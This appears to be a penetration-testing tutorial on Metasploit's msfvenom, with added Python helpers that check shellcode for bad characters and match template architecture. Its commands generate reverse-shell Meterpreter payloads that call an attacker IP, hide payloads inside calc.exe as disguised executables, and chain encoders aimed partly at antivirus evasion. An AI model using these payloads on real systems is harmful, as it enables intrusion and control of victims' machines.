
How to use Msfvenom in Penetration Testing : MSFVENOM Tutorial


Remember msfpayload and msfencode, the two tools used for Metasploit payload generation and payload encoding?

msfpayload and msfencode have been removed from the Metasploit Framework. So what do you use to create payloads now?

The answer is msfvenom.

Msfvenom combines payload generation and encoding in a single tool. It replaced msfpayload and msfencode on June 8th, 2015.


To start using msfvenom, first please take a look at the options it supports:

msfvenom --help

Options:
    -p, --payload    <payload>       Payload to use. Specify a '-' or stdin to use custom payloads
    -l, --list       [module_type]   List a module type. Options are: payloads, encoders, nops, all
    -n, --nopsled    <length>        Prepend a nopsled of [length] size on to the payload
    -f, --format     <format>        Output format (use --help-formats for a list)
    -e, --encoder    [encoder]       The encoder to use
    -a, --arch       <architecture>  The architecture to use
        --platform   <platform>      The platform of the payload
    -s, --space      <length>        The maximum size of the resulting payload
    -b, --bad-chars  <list>          The list of characters to avoid example: '\x00\xff'
    -i, --iterations <count>         The number of times to encode the payload
    -c, --add-code   <path>          Specify an additional win32 shellcode file to include
    -x, --template   <path>          Specify a custom executable file to use as a template
    -k, --keep                       Preserve the template behavior and inject the payload as a new thread
        --payload-options            List the payload's standard options
    -o, --out        <path>          Save the payload
    -v, --var-name   <name>          Specify a custom variable name to use for certain output formats
    -h, --help                       Show this message
        --help-formats               List available formats


How to use Msfvenom to generate a payload

To see which payloads are available in the Framework, run:

./msfvenom -l payloads

Typically, this is how you will use msfvenom: pick a payload, set its options (LHOST and LPORT for a reverse payload) as key=value pairs, choose an output format and write the result to a file:

$ ./msfvenom -p windows/meterpreter/reverse_tcp lhost=[Attacker's IP] lport=4444 -f exe -o /tmp/my_payload.exe

Note that a staged reverse payload such as this one only does something useful if a matching listener (exploit/multi/handler with the same payload, LHOST and LPORT) is already waiting when the executable runs; msfvenom only produces the file, it does not start the handler.

How to use Msfvenom to encode a payload

By default, the encoding feature will automatically kick in when you use the -b flag (the badchar flag). In other cases, you must use the -e flag like the following:

./msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -f raw

To find out what encoders you can use, you can use the -l flag:

./msfvenom -l encoders

You can also encode the payload multiple times using the -i flag. Sometimes more iterations help to get past a signature-based antivirus, but know that encoding isn't meant to be a real AV evasion solution: it exists to remove bad characters and to change the payload's byte pattern, and the decoder stub itself is well known to AV vendors:

./msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -i 3 

How to avoid bad characters

The -b flag is meant to be used to avoid certain characters in the payload. When this option is used, msfvenom will automatically find a suitable encoder to encode the payload:

./msfvenom -p windows/meterpreter/bind_tcp -b '\x00' -f raw
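The command above asks msfvenom to avoid 0x00, but an exploit that is sensitive to bad characters should verify the result rather than trust it, and the same check doubles as a size check for the -s budget. The following Python helper is an added example for this tutorial (it is not part of msfvenom and not from the original post): it builds the msfvenom command line from the flags listed in the help output above, captures the raw payload from stdout, and then verifies that none of the bad characters survived and that the blob fits the requested size. It assumes msfvenom is on PATH only when run as a script; the check functions themselves operate on any byte string, and the SAMPLE blob is constructed for the demonstration. It serves both the basic generation command shown earlier and the bad-character section here.

```python
"""Generate a payload with msfvenom and verify the raw output.

Added example for this tutorial; it is not part of msfvenom. The helper
builds the command line from the flags listed in the help output above,
captures the raw payload from stdout, and checks it against the
bad-character list and an optional size budget. msfvenom on PATH is
assumed only by the __main__ block at the bottom.
"""
from __future__ import annotations

import shutil
import subprocess
import sys


def parse_badchars(spec: str) -> bytes:
    """Turn a msfvenom-style spec such as '\\x00\\x0a' into raw bytes."""
    parts = [p for p in spec.split("\\x") if p]
    if not parts or any(len(p) != 2 for p in parts):
        raise ValueError(f"expected \\xNN pairs, got {spec!r}")
    return bytes(int(p, 16) for p in parts)


def find_badchars(payload: bytes, bad: bytes) -> dict[int, list[int]]:
    """Map each bad byte that occurs in payload to the offsets where it occurs."""
    hits: dict[int, list[int]] = {}
    for off, b in enumerate(payload):
        if b in bad:
            hits.setdefault(b, []).append(off)
    return hits


def check(payload: bytes, badchars: str, space: int | None = None) -> list[str]:
    """Return a list of problems with the blob; an empty list means it passes."""
    problems = []
    for b, offs in sorted(find_badchars(payload, parse_badchars(badchars)).items()):
        problems.append(f"bad char 0x{b:02x} at offsets {offs[:8]}")
    if space is not None and len(payload) > space:
        problems.append(f"{len(payload)} bytes exceeds the space budget of {space}")
    return problems


def msfvenom_cmd(payload: str, opts: dict[str, object], fmt: str = "raw",
                 badchars: str | None = None, encoder: str | None = None,
                 iterations: int | None = None, space: int | None = None) -> list[str]:
    """Build the msfvenom argv; every flag used here appears in the help output above."""
    cmd = ["msfvenom", "-p", payload]
    cmd += [f"{k}={v}" for k, v in opts.items()]  # payload options, e.g. LHOST=..., LPORT=...
    cmd += ["-f", fmt]
    if badchars:
        cmd += ["-b", badchars]
    if encoder:
        cmd += ["-e", encoder]
    if iterations:
        cmd += ["-i", str(iterations)]
    if space:
        cmd += ["-s", str(space)]
    return cmd


def generate(cmd: list[str]) -> bytes:
    """Run msfvenom and return the payload bytes it writes to stdout (no -o given)."""
    proc = subprocess.run(cmd, capture_output=True, check=False)
    if proc.returncode != 0:
        raise RuntimeError(proc.stderr.decode(errors="replace").strip())
    return proc.stdout


# Constructed sample (not msfvenom output): a blob that deliberately contains 0x00 and 0x0a.
SAMPLE = b"\xfc\xe8\x00\x00\x00\x00\x0a\x90\x90"

if __name__ == "__main__":
    if not shutil.which("msfvenom"):
        sys.exit("msfvenom is not on PATH")
    bad = "\\x00\\x0a\\x0d"
    cmd = msfvenom_cmd("windows/meterpreter/bind_tcp", {"LPORT": 4444},
                       badchars=bad, space=600)
    blob = generate(cmd)
    problems = check(blob, bad, space=600)
    print(f"{len(blob)} bytes: " + ("OK" if not problems else "; ".join(problems)))
    sys.exit(1 if problems else 0)
```

Run it as a script to generate a bind_tcp stager with 0x00, 0x0a and 0x0d excluded and a 600-byte budget; a non-zero exit with the offending offsets printed means the encoder did not deliver, which is exactly the case where you want to know before the shellcode is pasted into an exploit.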

How to supply a custom template using msfvenom

By default, msfvenom uses templates from the msf/data/templates directory. If you’d like to choose your own, you can use the -x flag like the following:

./msfvenom -p windows/meterpreter/bind_tcp -x calc.exe -f exe > new.exe 

Please note: if you'd like to create an x64 payload with a custom x64 template for Windows, then instead of the exe format you should use exe-only:

./msfvenom -p windows/x64/meterpreter/bind_tcp -x /tmp/templates/64_calc.exe -f exe-only > /tmp/fake_64_calc.exe

The -x flag is often paired with the -k flag, which allows you to run your payload as a new thread from the template. However, this currently is only reliable for older Windows machines such as x86 Windows XP.
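The advice above about x64 templates and exe-only only helps if you actually know the template's architecture, and an x86 payload injected into an x64 template (or the reverse) produces a file that simply crashes. The following Python check is an added example for this tutorial (not part of msfvenom and not from the original post): it reads the Machine field of the template's PE file header, compares it with the payload's architecture, and picks the -f value to use. It assumes only that x64 payloads carry the windows/x64/ prefix, as the payload names on this page do. The stub header built by make_stub is constructed for the demonstration and is not a real executable.

```python
"""Check that a -x template's architecture matches the payload before injecting,
and pick exe vs exe-only accordingly.

Added example for this tutorial, not part of msfvenom. It reads the PE headers
directly, so it needs no third-party module; make_stub() builds a constructed
minimal MZ + PE header for the demonstration, not a real program.
"""
from __future__ import annotations

import struct
import sys

IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_FILE_MACHINE_AMD64 = 0x8664
MACHINE_NAMES = {IMAGE_FILE_MACHINE_I386: "x86", IMAGE_FILE_MACHINE_AMD64: "x64"}


def pe_machine(data: bytes) -> int:
    """Return IMAGE_FILE_HEADER.Machine from a PE image held in memory."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not a DOS/PE executable (missing MZ header)")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]   # offset of the PE signature
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found at e_lfanew")
    if len(data) < e_lfanew + 6:
        raise ValueError("truncated COFF file header")
    return struct.unpack_from("<H", data, e_lfanew + 4)[0]  # Machine is the first COFF field


def payload_arch(payload_name: str) -> str:
    """Assumption: msfvenom names x64 Windows payloads windows/x64/..., everything else is x86."""
    return "x64" if payload_name.startswith("windows/x64/") else "x86"


def choose_format(payload_name: str, template: bytes) -> str:
    """Return the -f value for this payload/template pair, or raise on an architecture mismatch."""
    machine = pe_machine(template)
    tmpl = MACHINE_NAMES.get(machine, f"unknown machine 0x{machine:04x}")
    want = payload_arch(payload_name)
    if tmpl != want:
        raise ValueError(f"template is {tmpl} but payload {payload_name} is {want}")
    return "exe-only" if want == "x64" else "exe"


def make_stub(machine: int) -> bytes:
    """Constructed minimal MZ header + PE signature + 20-byte COFF header (not runnable)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew: PE header directly after the DOS header
    coff = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, 0, 0)  # Machine, NumberOfSections, ...
    return bytes(dos) + b"PE\0\0" + coff


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit(f"usage: {sys.argv[0]} <template.exe> <payload name>")
    with open(sys.argv[1], "rb") as fh:
        image = fh.read()
    print(choose_format(sys.argv[2], image))
```

For the second command on this page, `python check_template.py /tmp/templates/64_calc.exe windows/x64/meterpreter/bind_tcp` prints exe-only if the template really is a 64-bit image, and raises with both architectures named if someone handed you the 32-bit calc.exe instead.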

How to chain msfvenom output

The old msfpayload and msfencode utilities were often chained together in order to layer on multiple encodings. This is possible with msfvenom as well: each later stage reads the raw output of the previous one from stdin, and because a raw blob carries no metadata, the later stages need -a and --platform to know which encoders apply:

./msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.3 LPORT=4444 -f raw -e x86/shikata_ga_nai -i 5 | \
./msfvenom -a x86 --platform windows -e x86/countdown -i 8  -f raw | \
./msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 9 -f exe -o payload.exe


msfvenom is a promising addition to the Metasploit Framework.

About Vanshit Malhotra

Ethical Hacker | Cyber Forensics Investigator | Information Security Consultant. Vanshit Malhotra is an expert at security tactics, orchestrating operations to fit strategy. With 4+ years of experience in various domains of information security, I have been able to solve very complex security problems across many technologies and then teach and enable clients to do the same.
